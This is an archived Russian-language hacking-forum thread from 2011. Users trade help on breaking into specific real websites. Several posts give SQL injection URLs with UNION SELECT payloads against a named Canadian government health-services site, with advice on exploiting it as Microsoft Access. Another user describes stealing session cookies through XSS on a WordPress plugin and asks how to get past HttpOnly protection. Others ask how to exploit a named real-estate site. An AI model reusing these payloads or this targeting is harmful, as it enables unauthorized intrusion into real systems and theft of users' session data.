ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.06.2011, 18:39
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от BigBear
BigBear said:
Возникла трабла со скулёй
Не получается найти вывод. автоматические средства бессильны
Код:
Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+or+1=1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
У кого какие идеи ? Читай проведение SQL инъекций в Microsoft Access:
/thread50550.html
|
|
|
07.06.2011, 19:00
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Читал, пробовал разные варианты
Код:
Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects
Не получается вывести диагностические ошибки о правильности или неправильности |
|
|
|
08.06.2011, 02:37
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Всем привет!
Подскажите, по какой причине может передаваться не вся кука?
Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.
add:
На сайте wordpress 3.1.3... xss в форуме(плагин для wp).
Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
|
|
|
|
08.06.2011, 02:56
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
IMMORTAL_S, сам ответил на вопрос. HttpOnly
|
|
|
|
08.06.2011, 03:06
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Да, уже погуглил.
Что-то еще можно сделать?.. как-то убрать этот флаг?
add:
нашел ява апплет... всем спасибо))
|
|
|
|
08.06.2011, 03:49
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
|
|
|
|
08.06.2011, 05:27
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Сообщение от M_script
M_script said:
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
спасибо, лови +
пока забил на куки... нашел sqlinj
|
|
|
|
08.06.2011, 11:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
В какую сторону раскручивать?
Код:
Code:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит |
|
|
|
08.06.2011, 11:48
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от mix0x0
mix0x0 said:
В какую сторону раскручивать?
Код:
Code:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит Крутить нужно как проведение SQL инъекций в Microsoft Access:
/thread50550.html
но навряд ли ты ее раскрутишь
|
|
|
|
08.06.2011, 12:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут и тут
там 100500 БД...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
